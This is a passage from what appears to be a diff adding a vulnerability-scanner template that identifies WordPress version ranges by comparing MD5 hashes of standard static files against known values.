"(\"94f76a64411630ce10e215e74e518f47\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"ccda3ae7dca5f3ce647c51f953f36eda\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/media-image-widget.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"086291b366af501ea4378aca5dc07032\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"8fac7176be3db30dfc5d0c59514ac1f2\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"082c8d564caa265aa7aaaad422a4acee\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"8ec83b6b93233f94e76351378fdf2865\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/media-gallery-widget.js" + matchers: + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"437aac35ea3d3a698505ce9aa7a4c090\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - 
"(\"90ec0828c40b94a8e5f3eea5ce423fec\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"7bfc632ffa82a98949d5c2f5ea3c0e9b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/ie-rtl.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"12e3799f007d1876b12835d0e5ef2f52\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"0eaa7745837d3d443a69d044ed3d34ce\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"e3b5f3b8fced413fbba5140998158eb2\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"8a1eb2b5519ed4a89bd86735409925c3\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"931711f9b9b9e7c4182dbe7e382cf804\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"0b9e0977caa2f7f8f935d5b5536cf6d7\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"fd7d0df7b16e00fd528ccf616e4124d3\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"e1b5a696678e23949a7b98d8510e0f55\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"9a4e00d098d584cfb57cb10eaaa71214\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"879bad5fb1d6485b6d9b773c53771c36\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"3284308c86ab8da25a1102d29cf30bdf\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"7ee33e4b7774cdf5d016e99acf01409a\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"09ba525a650f839144871fba3f38c8f2\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"40582bd18d990906e258b22f748a5a31\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"f47a2b680e86328c5ca128a561360675\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"1f4b5b58ca585ed3897535738260631f\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"a0d306ff28ee7a91c04dd2ba920d589a\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - 
"(\"167ed35a0cf8b028cacc63b0894b6629\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"bf33651153ac82258acd4f56be924851\" == md5(body))" + - type: dsl + name: 2.5 - 2.6 + dsl: + - "(\"650555c0139e543813ef451d0e83873f\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"f6cb41f2339fb35c868329897706705d\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"e9c1bfd4053c8fc39dd8506be39cd1cf\" == md5(body))" + - type: dsl + name: 5.2 - 5.3.6 + dsl: + - "(\"55a791469c9bc1886f4272fd3c6ddf27\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b2eac5246949450f734078369c7a7d30\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/code-editor-rtl.css" + matchers: + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"b00c896ff0bcbcdd0c8d3f5331842e60\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"8c7770ef099a7c001a3f8d103d95291d\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"c1a750b14528327531f6920d680d409f\" == md5(body))" + - type: dsl + name: 5.2 - 5.3.6 + dsl: + - "(\"f2b0f0835b1c0011ee2f52a48af4abdf\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"33750485bdfeeabb2f63e40054422dc6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/hoverintent-js.min.js" + matchers: + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"492aa1f2633a89704f676a97e9a13a74\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"08207f7088b62e6096753736b01cc13f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js" + matchers: + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"ffff6c533f2ca672619b343bdd5e1546\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-url.js" + matchers: + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"f1983e64a04b50274943a4e733b5bd38\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-url.min.js" + matchers: + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"7274005802b2e364d7780806526095cf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js" + matchers: + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"bfba25ea79e5be8e3aef1ca60cac1e83\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/w-logo-blue-white-bg.png" + matchers: + - type: dsl + name: 5.4.2 - 5.6 + dsl: + - "(\"000bf649cc8f6bf27cfb04d1bcdcd3c7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-pointer.min.js" + matchers: + - type: dsl + name: 3.7 - 5.2.9 + dsl: + - "(\"368f987c644d70580097e48066c99082\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"44006ca7f608bdd5a0a6445d84dfa14d\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"a6b1f0f1180e40f7847a2a6d660da570\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"eb111877acfda6a2831ec64cca27e9d3\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"6ddb95e5911a96be8c8166011db91383\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"c323cf4339706987ff20d5d06c3b95cd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-auth-check.min.js" + matchers: + - type: dsl + name: 4.5 - 5.2.9 + dsl: + - "(\"99c97a7d6ad9e1ba06bbd76f29ecaad6\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"49773ca795f07b9a6f04caacd4ebc61b\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"4584099c38e5ed5f6f44644a79b6e473\" == md5(body))" + - type: dsl + name: 3.8.34 - 4.1.32 + dsl: + - "(\"b7a95205254b5b44d7da6c40feee0f71\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"9381710ce753b9832b1a2c698862ab3b\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"616c48c103a3090c52f6fbe7e4df4e97\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - 
"(\"1c475b507eb2f1d6e2086c0bff58852b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"6283adf848ff1848a76894050e791263\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c5999da6ac39a9e88a807571df55eeb6\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"2264f035cf3f6ab020bf1b40421184f3\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"c27f3884d55cb48bd02574d49fd9fdfb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/tags.min.js" + matchers: + - type: dsl + name: 4.8 - 5.2.9 + dsl: + - "(\"29e8d4a7d3c7c16432b99a053c7a5df5\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"4ec2ae66360aa0edc72274ea7188309a\" == md5(body))" + - type: dsl + name: 3.8 - 4.5.23 + dsl: + - "(\"172f499d40d4217bbf684cd552031acb\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"61be6f278a1f944b26447cdc26d835fe\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"5ef59229c14589b9cfa643363e830068\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"402b83d7eb8503875c7109fca9337099\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"b0934f29dd7066a46581e8e3e260610b\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"45bb1424ed1b5b1d133a043b26b235ca\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"f888c34433b712f06e43af40429ba9d4\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"17907e9882677f339e16eb884c1295e4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/color-picker.min.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"2e3a1f2a0ac299060d3c853e61d002b0\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"e6aa90b2182ca576285b067a632ab0c6\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"cf27af726c42ff82f96aa6b5d6c50936\" == md5(body))" + - type: dsl + name: 4.1 - 4.3.25 + dsl: + - "(\"1aa57d225b7d9bb8bfa8500e0c2de029\" == 
md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"5e6cb3e8e3774341f4a81ae60ff240ba\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.9.33 + dsl: + - "(\"d25e49828f69f88f952f7901ea23cd12\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"0700f055de0f02747e6bf5b1ecd2d362\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"9bee909f1eff9d9228caf7768440f935\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"f928ad0829d1c05c2c2d2a46acbbc3db\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"fb9ae1cb65eb001aa159656e525946af\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"ca1331e8606d08cddd3db4a1c50a0625\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"d8c89846a5bc52ad623c42aad0eede4c\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"fe70ea8607c181a61c44bdbfe9a86bdf\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"fbaf1efbbfa3d66fbbe551c04f55c274\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"9fc10081b896d90cb84e953e4a273e91\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/inline-edit-tax.min.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"dde9127de4c2995fc434b200f0dd615b\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"75c601c64c8582af3fd5501adf8a70df\" == md5(body))" + - type: dsl + name: 4.4.2 - 4.4.24 + dsl: + - "(\"83826163165ed1d49e8f3c6618d48c32\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.1 + dsl: + - "(\"8d376028d50307c5c478fb47e8573d09\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"31c678bb877b9fcfc08ee557a06bcef8\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"4aa2a2e6ee60243f003d3ebb47edf4b4\" == md5(body))" + - type: dsl + name: 3.8.34 - 4.1.32 + dsl: + - "(\"fb20ee6486993251b2345d7f10679170\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"6b10931419d409bc0e4dc2b985d93fad\" == 
md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"e152c4564839eea5d03f5c1f8f7f3304\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"f51e5bb7e388108cdbb09e73dab882b0\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"1e857c903f02b235ee15d338e578e0b0\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"276a51688f82154e668da8ccc2664360\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"8f644169a9fbdc883848e5045955e43f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"6df2176e4c845dae0a4798bfbe503380\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ce0ac0de288078af8c9421bd2e7fcb86\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"5b6cf02e1847560c7c2708b9cec8333c\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"5828c84d341a897ddba6d7c1a7074a26\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpfullscreen/editor_plugin.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"5d779b1702467d3ff8daf053f809a602\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"c3920f8399e5369fa7477612b192a85b\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"24b30b63b51ccaea07d4f8c13f058032\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"9e3439b2b5d41797f67e6c4f4d0f17a3\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"7a8cf8a6366e2a07ece9aa4ca4a8baba\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"19bd4858dd4636e58e5bf1b4c55886a7\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"c4e88d5a0c0ee055cc792ceedf20ad48\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/editor_plugin.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"625f3147b42809ded504e0aaba0d69e4\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - 
"(\"78da87ac01615efd1b9087de60c6e18e\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"1a99537df5afe33ad7972ed385716c03\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"a53c355041b61b5a9c030e21be5f2447\" == md5(body))" + - type: dsl + name: 2.9 - 3.3.3 + dsl: + - "(\"f052c91aba8f3eb8d7418730e2571096\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"c9fdf1db2027922e9bbdcd77dac6fb8b\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"eeb709706143ea4420b07cef572a7e85\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"14c91445e03a47d7f18294fcd1181ac3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/theme-install.min.js" + matchers: + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"667fcfc5babfffd925f42a9347a0f7ff\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"60cae9c8d9cb09c304baddd7b3c79486\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-loader.min.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"07ffbac3f2ba98be80444078bf478e06\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"50874b301967fa5cf16245d209ebee6c\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"920192c0f83cb413dcbd4c2d8907496d\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"8acc18afc849d02b6fd4050074a93a9b\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"b17d4faeeed1f4def3a3622c3f5fdb84\" == md5(body))" + - type: dsl + name: 3.7 - 3.9.33 + dsl: + - "(\"4bbf055e4673e39953b716ac908a0abf\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"17da53aeae6cc8d61bed50c2ab38c209\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"31d9f8e828b08e3de1c3922fd12161ad\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"4c72237dfde5e31f0c2d759ce3cac520\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - 
"(\"07da3b1185906661024d9b4162b39c4a\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"2d180d2fcea4d807be0600d25b2dc34a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-base.min.js" + matchers: + - type: dsl + name: 4.7.4 - 4.8.15 + dsl: + - "(\"82e54a4c50d795de58583bc8c3c5366c\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"1204a65bdca9b53b11e21b0a4006fed0\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"6d7aedb2931f1728e3052ad0916e890f\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"c872a6fb39d1e2392723b32871311ccb\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"2eac88d29658e3be60fb3502410e1d18\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"f82ef9ea2e66e725aca286df49f09644\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"dd9397747816f2234cd21d2f9d1a50f8\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.9.33 + dsl: + - "(\"5d8bdcb7dfef4c386321eb2e2447a038\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"bd0b29fbd66949b3c771ebc9c7d1b598\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"05b76950045388239de89bcb4043aa4a\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"43068dabcf577d41f4e84f59d8586628\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"0bcc3681daa40ee2e0ecee241388a898\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"1ccea3e2215182f5aac1b63aae392148\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"13024099bcd0d7bb501eaade5ee8509d\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"fcc7483e8bc9a333e8e4fe1aeee52504\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/shortcode.min.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"b342d56a90b09adfad6d95a4717c0b24\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - 
"(\"82ad4fbf4eb5f246ebcd565b66a00bee\" == md5(body))" + - type: dsl + name: 3.9.1 - 4.3.25 + dsl: + - "(\"18ba5832006079f3bcbdeb4c38c92adf\" == md5(body))" + - type: dsl + name: 3.7 - 3.9 + dsl: + - "(\"94f0a6572dc53376bc73c29e2dbc2d27\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"45b08b8d56d3b5138e2056cda31fd674\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"1c041f7f933a23946e80dc51b5e1c938\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"18e0dd81085ad19822288e41aefbfca9\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"ac175b8437594f86e5f28bf90a4306bf\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"cff973dcfb4f01f66d15dae46b318d59\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/heartbeat.min.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"126cc4d1e35b74edb525b06e3788e0f2\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"1a30d2f3f43f2e3fb867298e53cad1a1\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"1dd3c7ed8699b740ebf4040b1304436d\" == md5(body))" + - type: dsl + name: 3.8.34 - 4.0.32 + dsl: + - "(\"ce0f4c41502115dd456d8fe69ad9d6a6\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"1ea138dbe250685292d30ac37620acfc\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"9aae6231a46e14ac89912dba8c94625f\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"291eec7c9016045eab556f6cd9e988fd\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"364c2b9d670cdf41e827a627eb11b04b\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"37ce90356b4d2587270f9f9fce795035\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"1b189a9d958d638c3bd1459ab6d19f8d\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"f860581fb8612b68fa2503e50422b737\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - 
"(\"f44e97b62fc8a3a338fcc764a887e455\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/gallery.min.js" + matchers: + - type: dsl + name: 4.4 - 5.0.11 + dsl: + - "(\"4e7b25e9bc3374cf391d5a652651a277\" == md5(body))" + - type: dsl + name: 3.8.34 - 4.3.25 + dsl: + - "(\"1c986fe3039dbacf126de2f0dc644f6f\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"b54be68c89acf61cb65c5a6be0afd68d\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"7f4fb19184e149d7c0578c37983a258b\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"60bf226af2fd347b5a9deabe699a7a57\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"a0128dff24056e6476db0cf96ed23139\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"501eb34a56ce4495a13d4e467916955d\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"cacc448a4e2a324a23bb2b00fccc994e\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"09225ccd5df14b041aa451535d952d0b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/handlers.min.js" + matchers: + - type: dsl + name: 4.6.6 - 5.2.9 + dsl: + - "(\"a08d4288293bfbcd0d198f7aa3eda619\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.4 + dsl: + - "(\"3ea40ab7c27b75d20c3da22f097d6614\" == md5(body))" + - type: dsl + name: 4.2.15 - 4.5.23 + dsl: + - "(\"11bf2f04087fa26d73fe609aea0deb5c\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.8 + dsl: + - "(\"813ceb60612a365924d271704d03d95c\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.17 + dsl: + - "(\"e10ed46fab9c2698e592308ef1bc1274\" == md5(body))" + - type: dsl + name: 3.9.19 - 4.1.32 + dsl: + - "(\"a4ceb21a21b2f7387cda6aa3987fbe5d\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.20 + dsl: + - "(\"ddf4c7760bc883551c7c624c96366b2c\" == md5(body))" + - type: dsl + name: 3.8.21 - 3.8.33 + dsl: + - "(\"5134fc8ba506fcb19b83f48e00f13173\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.20 + dsl: + - 
"(\"7f22f0ade68c07f94df3b40a9ab01632\" == md5(body))" + - type: dsl + name: 3.7.21 - 3.7.33 + dsl: + - "(\"d784d1950872d6bf872f285bcf801def\" == md5(body))" + - type: dsl + name: 3.5.2 - 3.6.1 + dsl: + - "(\"ea290fe2e1a4d1d6433f46636417c28a\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.1 + dsl: + - "(\"d672c9820c43194fc1d0b7536ec55bc9\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"0af080d323b400286d6b6c1ce141abfc\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"ae0fb9c92bfd8b294508118aa3a9f7d5\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"9164287a9d6da8155bcdd5888fbcab4f\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"07da0a8acb054283d518eef97bbbd180\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/nav-menu.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"f881f44197fe880cb2257955d66a167f\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"030df1f8550983eeb6f34ff46bfd8d7b\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"a80e641bb281235d159937ecd5b8393f\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"2fa48561beb42a5197c7e4dbb812d9b8\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"9c5d52b7116f10e4f64a766649725752\" == md5(body))" + - type: dsl + name: 4.2.4 - 4.2.29 + dsl: + - "(\"6878c388ff6f0063e6c31d0d3b28ecdb\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.3 + dsl: + - "(\"e2fe94b081c4f0bb2e673b75b2d72b23\" == md5(body))" + - type: dsl + name: 4.0.2 - 4.1.32 + dsl: + - "(\"27f1093ab09c8fe7c9e5eeed62525b41\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.1 + dsl: + - "(\"c5307758e7cda56b18b721eaad458db6\" == md5(body))" + - type: dsl + name: 3.9.4 - 3.9.33 + dsl: + - "(\"1bf86ac908560d0942c89fa5bb260ac1\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.3 + dsl: + - "(\"e5ab45817f930b0542eb4efe964ca1d6\" == md5(body))" + - type: dsl + name: 3.8.6 - 3.8.33 + dsl: + - 
"(\"2dbeb77845c920d2a43089badf02558d\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.5 + dsl: + - "(\"8c02fa2ffa234c96ba76341532da142e\" == md5(body))" + - type: dsl + name: 3.7.6 - 3.7.33 + dsl: + - "(\"f8c1f1f9fdc67b64689ad8cb43bcd7de\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.5 + dsl: + - "(\"5e84057e24cd23183bafd40b381c8ad4\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"f93efefe6ca9c827a2ff395f6297cc16\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"7a8d1cf1023a40442ca8efc5c8bc6787\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"5169d979fee3b7679953b2b7f434910d\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.2 + dsl: + - "(\"6ab2461212b35857ae0c979439dd59f1\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"cb52510d41dbe0e748c6f2d4aaaf85ed\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"5b46976c3745c39d14e55e06067a8373\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - 